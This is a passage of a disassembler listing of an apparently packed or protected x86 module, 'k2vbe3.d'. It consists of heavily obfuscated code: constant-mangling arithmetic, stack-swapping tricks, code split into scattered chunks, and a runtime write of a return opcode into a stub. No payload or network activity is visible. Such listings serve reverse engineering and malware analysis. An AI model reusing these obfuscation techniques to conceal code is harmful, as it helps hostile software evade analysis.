; END OF FUNCTION CHUNK	FOR sub_444B3E
; ---------------------------------------------------------------------------

loc_44B7C0:				; CODE XREF: k2vbe3.d:004419CAj
		add	ecx, ebp
		and	edx, 0DDAAD008h

loc_44B7C8:				; CODE XREF: k2vbe3.d:loc_4419C3j
		or	esi, 20FCE5B6h
		sub	esi, 25F42946h
		add	esi, 23CAB27h
		xchg	esi, [esp]
		jmp	sub_4553CC

; =============== S U B	R O U T	I N E =======================================



sub_44B7E2	proc near		; CODE XREF: sub_452693-140FFp
					; k2vbe3.d:0044E94Aj
		xchg	edi, [esp+0]
		pop	edi
		add	edx, ebp
		add	edx, 52BF95EDh
		mov	[edx], eax
		pop	edx
		popf
		mov	eax, offset dword_446FEC
sub_44B7E2	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44D298

loc_44B7F7:				; CODE XREF: sub_44D298:loc_44FB03j
		jmp	loc_45A522
; END OF FUNCTION CHUNK	FOR sub_44D298
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457D4B

loc_44B7FC:				; CODE XREF: sub_457D4B:loc_4460BDj
		or	eax, eax
		jnz	loc_4489A8
		jmp	loc_4502CA
; END OF FUNCTION CHUNK	FOR sub_457D4B
; ---------------------------------------------------------------------------

loc_44B809:				; CODE XREF: k2vbe3.d:00458562j
		xor	edi, 0A6FBA332h
		cmp	edi, 3AB0FBB8h
		jmp	loc_456571
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_44B81A:				; CODE XREF: sub_44DB59-A1A5j
					; sub_44DB59:loc_457512j
		push	0E6F70FBAh
		xchg	edi, [esp+4+var_4]
		mov	eax, edi
		pop	edi
		jmp	loc_44A427
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_44B82A:				; CODE XREF: sub_447C43+5E8Cj
		jns	loc_43EA3E
		xor	esi, edi
		xor	edx, ebx
		jmp	loc_456820
; END OF FUNCTION CHUNK	FOR sub_447C43
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_44B839:				; CODE XREF: sub_44FF97:loc_452A1Aj
		pop	eax
		xor	eax, 961B839Bh
		add	eax, 9710A6B5h
		xor	eax, 17C8942Fh
		rol	eax, 4
		add	eax, 3D6F71A0h
		jmp	loc_45A161
; END OF FUNCTION CHUNK	FOR sub_44FF97
; ---------------------------------------------------------------------------

locret_44B85A:				; CODE XREF: k2vbe3.d:00453B8Fj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454903

loc_44B85B:				; CODE XREF: sub_454903+10j
		jmp	loc_43C664
; END OF FUNCTION CHUNK	FOR sub_454903
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F64

loc_44B860:				; CODE XREF: sub_442F64+9j
		jmp	loc_44EC1E
; END OF FUNCTION CHUNK	FOR sub_442F64
; ---------------------------------------------------------------------------

loc_44B865:				; CODE XREF: sub_451287+Cj
		jnz	loc_458FF0
		jmp	loc_44C684

; =============== S U B	R O U T	I N E =======================================



sub_44B870	proc near		; DATA XREF: sub_446E24:loc_443B4Bo

; FUNCTION CHUNK AT 0044025A SIZE 00000031 BYTES
; FUNCTION CHUNK AT 00442120 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442B35 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00442E1C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00446CFA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00446D6E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004478D9 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 00447A8E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B017 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B09E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BA48 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045147C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00454935 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B381 SIZE 00000005 BYTES

		jb	loc_442E1C
		cmp	dword ptr [ebp-4], 3
		jnz	loc_457556
		jmp	loc_44B09E
sub_44B870	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440CA

loc_44B885:				; CODE XREF: sub_4440CA:loc_447757j
		jz	loc_456B97
		jmp	loc_4409A1
; END OF FUNCTION CHUNK	FOR sub_4440CA
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esi
		call	sub_448417
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44B898:				; CODE XREF: sub_45A323-72F8j
		jmp	nullsub_389
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452ECC

loc_44B89D:				; CODE XREF: sub_452ECC:loc_43D316j
		jmp	sub_452ECC
; END OF FUNCTION CHUNK	FOR sub_452ECC
; ---------------------------------------------------------------------------
		mov	eax, 20413B0Fh
		push	eax
		push	6BA1676h
		pop	eax
		jmp	loc_45606D
; ---------------------------------------------------------------------------

loc_44B8B3:				; CODE XREF: k2vbe3.d:00451B56j
		jp	loc_44C977

loc_44B8B9:				; CODE XREF: k2vbe3.d:loc_44D183j
		call	sub_4436CE
		push	0BBC2925Dh
		pop	edx
		xor	edx, 49ABAFCAh
		and	edx, 0D7C76CCAh
		add	edx, 7C14CA82h
		jmp	loc_43F9D8
; ---------------------------------------------------------------------------
		mov	ds:dword_41E0E0, eax
		lea	eax, nullsub_519
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_519

; =============== S U B	R O U T	I N E =======================================



sub_44B8EF	proc near		; CODE XREF: sub_40FAE4+2Dp
					; sub_41A2A7+30p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00441453 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044175D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446D24 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044909A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C45F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00452731 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045311D SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0045586E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004592A6 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045BCE3 SIZE 0000000B BYTES

		jns	loc_45586E
		push	1418AF4Eh
		pop	eax
		add	eax, 284DEECFh
		jmp	loc_44C45F
sub_44B8EF	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_44B906:				; CODE XREF: k2vbe3.d:loc_44E113j
					; sub_4481FA+6791j
		jz	loc_441B2B
		jmp	loc_451E16
; END OF FUNCTION CHUNK	FOR sub_4481FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44B911:				; CODE XREF: sub_44B94B-7DC3j
					; k2vbe3.d:loc_457297j
		cdq
; END OF FUNCTION CHUNK	FOR sub_44B94B

; =============== S U B	R O U T	I N E =======================================



sub_44B912	proc near		; CODE XREF: sub_44B979:loc_4501BAp

arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043EB2F SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004413CA SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0044191B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442529 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004432CB SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044371C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443D49 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444F4A SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044618E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004461C3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446923 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00448912 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449AD1 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00449F71 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044AEBE SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044B072 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044B2BE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B57C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CB47 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D272 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DDC4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044DF90 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044E1BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E407 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E564 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044E57C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044EE16 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00450EB7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451073 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451A28 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00452B6B SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452E6C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004545D8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004548A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455177 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455C8E SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00456561 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456962 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045752B SIZE 0000002B BYTES
; FUNCTION CHUNK AT 00458FC2 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00459874 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A973 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045BF36 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0A5C2E94Ah
		pop	ecx
		jmp	loc_44EE16
sub_44B912	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jns	loc_452D92
		or	eax, edx
		jmp	sub_4496A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FBDF

loc_44B92E:				; CODE XREF: sub_44FBDF+Aj
		xchg	edi, [esp+0]
		call	sub_447BE9
		mov	eax, 0F38AA262h
		call	sub_4553CC
		push	esi
		push	offset loc_44050E
		jmp	nullsub_97
; END OF FUNCTION CHUNK	FOR sub_44FBDF

; =============== S U B	R O U T	I N E =======================================



sub_44B94B	proc near		; DATA XREF: sub_45A323:loc_453026o

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C645 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043D012 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043D113 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0043E32E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E4F6 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0043EF23 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F0A2 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0043F0C5 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0043FBC5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440141 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044020E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044041A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004408F1 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00440CE5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440E48 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00441D78 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00441ED6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044265D SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443B82 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044417C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00445167 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004465F7 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044778E SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00447F02 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00447F38 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004486A3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004492DC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00449AC5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449B2B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044AAA1 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044B911 SIZE 00000001 BYTES
; FUNCTION CHUNK AT 0044BFF6 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0044D07B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D2EC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D404 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D9B8 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0044EDE7 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044F4EE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F7EE SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004509E3 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00451658 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045289D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453C60 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004546FF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045470C SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00454742 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004554D7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045571B SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00456EFE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00457CA4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004587E6 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00459418 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A0D7 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045B0C4 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045B235 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0045BC35 SIZE 0000000D BYTES

		push	606F5741h
		pop	eax
		xor	eax, 32F7098Dh
		sub	eax, 87FCA27Eh
		or	eax, 0D94F5B55h
		jmp	loc_44417C
sub_44B94B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4508A3

loc_44B968:				; CODE XREF: k2vbe3.d:00448EB2j
					; sub_4508A3:loc_44A071j
		and	ebp, 0A830872Dh
		sub	esi, 0F79F9543h
		jmp	loc_4566EE
; END OF FUNCTION CHUNK	FOR sub_4508A3

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44B979	proc near		; CODE XREF: sub_45A323:loc_44288Dp

var_814		= dword	ptr -814h
var_800		= byte ptr -800h

; FUNCTION CHUNK AT 0043DFAF SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043DFD1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E633 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043F66E SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043FA68 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440726 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441758 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004417E2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 004447AA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004462FA SIZE 00000006 BYTES
; FUNCTION CHUNK AT 004463A9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004483A1 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C12C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044C423 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044C935 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D68F SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044DD5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044EDDD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004501BA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451411 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00452BAE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045501A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458C00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459133 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B259 SIZE 00000022 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFF7ECh
		push	82DAA161h
		pop	eax
		add	eax, 6207CBACh
		xor	eax, 0E4E26D04h
		jmp	loc_43DFD1
sub_44B979	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44B999	proc near		; CODE XREF: k2vbe3.d:004404C0j
					; sub_452CF7+784Cp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043EE06 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043EFE3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0043FBED SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00442F02 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0044367C SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00443ADA SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444C44 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00444E85 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447572 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448F99 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044B3E2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C361 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C9F3 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044D921 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E7CF SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044F8E1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FD96 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004515F6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00451E23 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00451E88 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00456147 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00456F99 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00458EDD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459D8A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0045A17B SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_43FA94
		jmp	loc_458EDD
sub_44B999	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	ebp, 0FC1E6C6Ch
		jmp	loc_44FF1A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451759

loc_44B9B7:				; CODE XREF: sub_451759j
		mov	edx, ds:dword_448B14
		or	edx, edx
		jnz	loc_44D254
		jmp	loc_459FC7
; END OF FUNCTION CHUNK	FOR sub_451759
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_244. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		push	34F14B02h
		jmp	sub_4497D1
; ---------------------------------------------------------------------------

loc_44B9D5:				; DATA XREF: sub_449788+1o
		call	sub_444FB1
		push	1F6A8A5Bh
		pop	eax
		rol	eax, 1Fh
		add	eax, 4588521Eh
		call	sub_4553CC
		push	edx
		jmp	loc_446F81
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455BEA

loc_44B9F4:				; CODE XREF: sub_455BEA:loc_4521C6j
		push	eax
		call	sub_453347
		retn
; END OF FUNCTION CHUNK	FOR sub_455BEA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_44B9FB:				; CODE XREF: sub_44D0D5+5163j
		jmp	loc_455034
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44BA00:				; CODE XREF: sub_45A323-FC12j
		jmp	loc_4547E0
; END OF FUNCTION CHUNK	FOR sub_45A323

; =============== S U B	R O U T	I N E =======================================



sub_44BA05	proc near		; CODE XREF: sub_44E90D-1258Cp
					; sub_44EABB-10A24j ...

; FUNCTION CHUNK AT 0044E1C2 SIZE 00000005 BYTES

		push	eax
		push	0
		call	sub_44469A
		jmp	loc_44E1C2
sub_44BA05	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45762D

loc_44BA12:				; CODE XREF: sub_45762D-AC64j
		sub	ecx, 840BF459h
		cmp	ecx, 7D76DF8Eh
		jmp	loc_440B8B
; END OF FUNCTION CHUNK	FOR sub_45762D
; ---------------------------------------------------------------------------

loc_44BA23:				; CODE XREF: k2vbe3.d:0044ACFCj
		popf
		xchg	ecx, [esp]
		pushf
		push	0D1AD7A76h
		pop	eax
		sub	eax, 845A2412h
		jmp	loc_459CF9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DFE1

loc_44BA39:				; CODE XREF: sub_43DFE1+16j
		jp	loc_44A2BF
		and	esi, edx
		test	ebp, edi
		jmp	loc_44A0E7
; END OF FUNCTION CHUNK	FOR sub_43DFE1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B870

loc_44BA48:				; CODE XREF: sub_44B870:loc_447A8Ej
					; k2vbe3.d:loc_452827j
		shr	ebx, 7
		mov	ebp, [edi]
		add	esi, 617B3C81h
		pop	edi
		jmp	loc_457556
; END OF FUNCTION CHUNK	FOR sub_44B870
; ---------------------------------------------------------------------------
		jnp	locret_43EF92
		jmp	sub_45544E
; ---------------------------------------------------------------------------
		push	eax
		jmp	sub_43C779
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_284. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4523BE

loc_44BA6B:				; CODE XREF: sub_4523BE+1Cj
		jmp	loc_4557E8
; END OF FUNCTION CHUNK	FOR sub_4523BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4570C0

loc_44BA70:				; CODE XREF: sub_4570C0-14BFCj
		jz	loc_442504
		jmp	loc_451BB4
; END OF FUNCTION CHUNK	FOR sub_4570C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BE94

loc_44BA7B:				; CODE XREF: sub_45B4A2:loc_43ED12j
					; sub_45B4A2-F1BBj ...
		xchg	eax, edx
		call	sub_45B20A
; END OF FUNCTION CHUNK	FOR sub_45BE94
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_374. PRESS KEYPAD	"+" TO EXPAND]
		dw 0EEB2h
dword_44BA84	dd 0			; DATA XREF: sub_45BE94-3150w
					; sub_45B4A2+Ar
dword_44BA88	dd 349088A7h, 32178C99h	; DATA XREF: sub_45BE94-18908o
					; sub_44533A+4o
		db 63h,	6Ch, 0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442DF0

loc_44BA93:				; CODE XREF: sub_442DF0+11BC1j
		jmp	nullsub_171
; END OF FUNCTION CHUNK	FOR sub_442DF0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447664

loc_44BA98:				; CODE XREF: sub_447664+9j
		jmp	loc_4446A7
; END OF FUNCTION CHUNK	FOR sub_447664
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456541

loc_44BA9D:				; CODE XREF: sub_456541+Aj
		mov	[ebp-10h], eax
		mov	eax, [ebp+8]
		mov	eax, [eax-10h]
		and	eax, 7
		mov	[ebp-14h], eax
		cmp	dword ptr [ebp-10h], 3
		jmp	loc_43DDEB
; END OF FUNCTION CHUNK	FOR sub_456541
; ---------------------------------------------------------------------------

loc_44BAB5:				; CODE XREF: k2vbe3.d:00446D07j
		jz	loc_43F6EA
		cmp	edi, ebp
		jmp	loc_452B14
; ---------------------------------------------------------------------------
		jmp	loc_444CE0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_366. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440E5

loc_44BAC8:				; CODE XREF: sub_4440E5+16B58j
		jmp	loc_454DEA
; END OF FUNCTION CHUNK	FOR sub_4440E5
; ---------------------------------------------------------------------------

loc_44BACD:				; CODE XREF: k2vbe3.d:00453EB0j
		call	nullsub_11

loc_44BAD2:				; CODE XREF: k2vbe3.d:00450829j
		jnz	loc_455331
		call	sub_43C04E
		jmp	loc_4425AF
; ---------------------------------------------------------------------------

loc_44BAE2:				; CODE XREF: k2vbe3.d:00443D6Fj
		mov	edx, [ebx]

; =============== S U B	R O U T	I N E =======================================



sub_44BAE4	proc near		; CODE XREF: sub_4561EE+1p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004450B5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00445525 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004536B6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B39F SIZE 00000020 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	0C1C09E7Eh
		pop	eax

loc_44BAEE:				; CODE XREF: k2vbe3.d:00450F64j
		jmp	loc_445525
sub_44BAE4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_44BAF3:				; CODE XREF: sub_443BDF:loc_441F93j
					; sub_45A323+145j
		push	ecx
		call	sub_44529A
; END OF FUNCTION CHUNK	FOR sub_443BDF
; START	OF FUNCTION CHUNK FOR sub_44E2C0

loc_44BAF9:				; CODE XREF: sub_44E2C0+7j
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_44E2C0
; ---------------------------------------------------------------------------

loc_44BAFE:				; CODE XREF: k2vbe3.d:loc_4411D0j
		mov	eax, ecx
		pop	ecx
		pop	eax
		xchg	ebp, [esp]
		mov	ebx, ebp
		pop	ebp
		pop	ecx
		pop	edx
		jmp	loc_43EACB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_532. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F1

loc_44BB10:				; CODE XREF: sub_44D2F1-10323j
		jmp	loc_45B534
; END OF FUNCTION CHUNK	FOR sub_44D2F1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_73. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F64

loc_44BB16:				; CODE XREF: sub_442F64+BCCEj
		jz	loc_4590B0
		jmp	loc_449B64
; END OF FUNCTION CHUNK	FOR sub_442F64
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44BB21:				; CODE XREF: sub_440C94+1595Fj
		jnz	loc_44C7D8
		and	ebx, 0C6D7D2FDh
		jmp	loc_44A89F
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD42

loc_44BB32:				; CODE XREF: sub_45AD42-16B9Cj
		jnp	loc_457884
		and	edx, 988852FCh
		xchg	ebx, edi
		jmp	loc_4471FB
; END OF FUNCTION CHUNK	FOR sub_45AD42
; ---------------------------------------------------------------------------

loc_44BB45:				; CODE XREF: k2vbe3.d:00450917j
		jg	loc_452892

; =============== S U B	R O U T	I N E =======================================



sub_44BB4B	proc near		; CODE XREF: sub_45A323+38p

; FUNCTION CHUNK AT 00458ACE SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [eax]
		popf
		movzx	eax, word ptr [eax]
		jmp	loc_458ACE
sub_44BB4B	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_44BB5A:				; CODE XREF: sub_44F028:loc_445079j
					; sub_454E69-73DDj
		mov	eax, [ebp-18h]
		test	dword ptr [eax], 0FFFF0000h
		jmp	loc_4405C4
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_44BB68:				; CODE XREF: sub_444EFA:loc_45105Ej
		jnz	loc_43E76D
		jmp	loc_447194
; END OF FUNCTION CHUNK	FOR sub_444EFA

; =============== S U B	R O U T	I N E =======================================



sub_44BB73	proc near		; CODE XREF: sub_447E90:loc_442022p
					; k2vbe3.d:004426B0j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043D296 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043E47F SIZE 00000005 BYTES
